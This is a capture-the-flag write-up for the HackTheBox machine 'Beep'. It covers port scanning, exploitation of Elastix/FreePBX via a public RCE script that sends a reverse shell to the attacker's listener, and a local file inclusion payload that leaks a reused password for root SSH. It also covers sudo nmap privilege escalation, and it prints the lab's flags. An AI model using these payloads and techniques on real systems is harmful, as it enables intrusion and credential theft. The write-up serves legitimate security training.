HackTheBox Beep
Writeup for HackTheBox Beep
HackTheBox Beep
Machine Synopsis
Beep has a very large list of running services, which can make it a bit challenging to find the correct entry method. This machine can be overwhelming for some as there are many potential attack vectors. Luckily, there are several methods available for gaining access. (Source)
Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
$ nmap -sC -sV -A -p- 10.10.10.7
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp open http Apache httpd 2.2.3
|_http-title: Did not follow redirect to https://10.10.10.7/
|_http-server-header: Apache/2.2.3 (CentOS)
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_pop3-capabilities: USER PIPELINING RESP-CODES AUTH-RESP-CODE APOP EXPIRE(NEVER) UIDL IMPLEMENTATION(Cyrus POP3 server v2) STLS TOP LOGIN-DELAY(0)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 875/udp status
|_ 100024 1 878/tcp status
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_imap-capabilities: NAMESPACE Completed CONDSTORE UNSELECT MULTIAPPEND RIGHTS=kxte LITERAL+ CHILDREN ACL OK SORT LIST-SUBSCRIBED X-NETSCAPE NO RENAME CATENATE URLAUTHA0001 IDLE SORT=MODSEQ MAILBOX-REFERRALS ANNOTATEMORE LISTEXT THREAD=ORDEREDSUBJECT BINARY UIDPLUS ID QUOTA IMAP4rev1 THREAD=REFERENCES STARTTLS ATOMIC IMAP4
|_imap-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS))
| http-robots.txt: 1 disallowed entry
|_/
|_ssl-date: 2022-06-27T07:41:11+00:00; 0s from scanner time.
|_http-server-header: Apache/2.2.3 (CentOS)
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after: 2018-04-07T08:22:08
|_http-title: Elastix - Login page
878/tcp open status 1 (RPC #100024)
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_ssl-known-key: ERROR: Script execution failed (use -d to debug)
3306/tcp open mysql MySQL (unauthorized)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp open upnotifyp?
4559/tcp open hylafax HylaFAX 4.3.10
5038/tcp open asterisk Asterisk Call Manager 1.1
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Here is the default webpage.
It seems to be a login page. Default credentials does not work so lets run a gobuster scan!
1
2
3
4
5
6
7
8
9
$ gobuster dir -u https://10.10.10.7 -w /usr/share/wordlists/dirb/common.txt -t 50 -k
...
/.htpasswd (Status: 403) [Size: 287]
/.hta (Status: 403) [Size: 282]
/.htaccess (Status: 403) [Size: 287]
/admin (Status: 301) [Size: 309] [--> https://10.10.10.7/admin/]
/cgi-bin/ (Status: 403) [Size: 286]
/configs (Status: 301) [Size: 311] [--> https://10.10.10.7/configs/]
...
-kto ignore certificate errors
There’s an interesting /admin page. However, default credentials doesn’t work as well.
After clicking cancel, it brings us to this error page which shows the version number of Elastix FreePBX!
Now that we have the version number of the website, we can search for existing exploits using searchsploit.
1
2
3
4
5
6
7
8
9
10
11
12
$ searchsploit elastix
------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------ ---------------------------------
Elastix - 'page' Cross-Site Scripting | php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vulnerabilities | php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities | php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclusion | php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection | php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection | php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution | php/webapps/18650.py
------------------------------------------------------------------------------------ ---------------------------------
Exploitation
Exploit - RCE
1
2
3
$ searchsploit -m 18650
$ cat 18650.py
...
From the script, it seems like we need to change 3 things - rhost, lhost and extension. I have no idea what was the extension that the script mentioned. So I Googled for find voip extensions kali and it returned a result to kali’s sipvicious package which had svwar - an extension line scanner.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$ svwar -h
Usage: svwar [options] target
examples:
svwar -e100-999 udp://10.0.0.1:5080
svwar -d dictionary.txt 10.0.0.2
...
-m OPTIONS, --method=OPTIONS
specify a request method. The default is REGISTER.
Other possible methods are OPTIONS and INVITE
...
$ svwar -m INVITE -e100-999 10.10.10.7
WARNING:TakeASip:using an INVITE scan on an endpoint (i.e. SIP phone) may cause it to ring and wake up people in the middle of the night
WARNING:TakeASip:extension '690' probably exists but the response is unexpected
+-----------+----------------+
| Extension | Authentication |
+===========+================+
| 233 | reqauth |
+-----------+----------------+
| 690 | weird |
+-----------+----------------+
Now, lets change the script values to what we want.
1
2
3
rhost="10.10.10.7"
lhost="10.10.16.10"
extension="233"
Executing the script here results in some [SSL: UNSUPPORTED_PROTOCOL] unsupported protocol error. Let’s run sslscan on the site to identify what SSLs does it support.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ sslscan 10.10.10.7
Version: 2.0.12-static
OpenSSL 1.1.1n-dev xx XXX xxxx
Connected to 10.10.10.7
Testing SSL server 10.10.10.7 on port 443 using SNI name 10.10.10.7
SSL/TLS Protocols:
SSLv2 disabled
SSLv3 enabled
TLSv1.0 enabled
TLSv1.1 disabled
TLSv1.2 disabled
TLSv1.3 disabled
...
It seems like the website only supports SSLv3 and TLSv1.0. Let’s change our own config file to something more generic.
1
2
3
4
5
$ cat /etc/ssl/openssl.cnf
...
[system_default_sect]
MinProtocol = None
CipherString = DEFAULT
This was the original
openssl.cnffile.
Now we should be able to run the exploit.
1
$ python 18650.py
1
2
3
4
5
$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.16.10] from (UNKNOWN) [10.10.10.7] 60562
whoami
asterisk
Alternative Exploit - Local File Inclusion
1
2
3
4
5
$ searchsploit -m 37637
$ cat 37637.pl
...
#LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
...
Lets apply the exploit string on the website!
From the source code, it seems like there are some interesting credentials.
1
2
3
4
5
6
7
8
9
10
AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE
It seems like there’s an admin username and password! This credentials are most probably ssh credentials.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
$ ssh root@10.10.10.7
Unable to negotiate with 10.10.10.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
$ ssh root@10.10.10.7 -oKexAlgorithms=+diffie-hellman-group1-sha1
Unable to negotiate with 10.10.10.7 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss
$ ssh root@10.10.10.7 -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss
The authenticity of host '10.10.10.7 (10.10.10.7)' can't be established.
DSA key fingerprint is SHA256:AGaW4a0uNJ7KPMpSOBD+aVIN75AV3C0y8yKpqFjedTc.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.7' (DSA) to the list of known hosts.
root@10.10.10.7's password: jEhdIekWmdjE
Last login: Tue Jul 16 11:45:47 2019
Welcome to Elastix
----------------------------------------------------
To access your Elastix System, using a separate workstation (PC/MAC/Linux)
Open the Internet Browser using the following URL:
http://10.10.10.7
[root@beep ~]# whoami
root
Privilege Escalation
Lets run sudo -l to check if we can run any command with privilege.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$ sudo -l
Matching Defaults entries for asterisk on this host:
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY"
User asterisk may run the following commands on this host:
(root) NOPASSWD: /sbin/shutdown
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/bin/yum
(root) NOPASSWD: /bin/touch
(root) NOPASSWD: /bin/chmod
(root) NOPASSWD: /bin/chown
(root) NOPASSWD: /sbin/service
(root) NOPASSWD: /sbin/init
(root) NOPASSWD: /usr/sbin/postmap
(root) NOPASSWD: /usr/sbin/postfix
(root) NOPASSWD: /usr/sbin/saslpasswd2
(root) NOPASSWD: /usr/sbin/hardware_detector
(root) NOPASSWD: /sbin/chkconfig
(root) NOPASSWD: /usr/sbin/elastix-helper
Used GTFObins to check for any interesting privilege escalation techniques and nmap appeared to be the one we’re looking for.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ sudo nmap --interactive
Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
whoami
root
cd /home
ls
fanis
spamfilter
cat /home/fanis/user.txt
3ef574d538895f20a84739bddd0a7c9f
cat /root/root.txt
d7aa9cd47efa9b103e8f0274b11c00e3
This post is licensed under CC BY 4.0 by the author.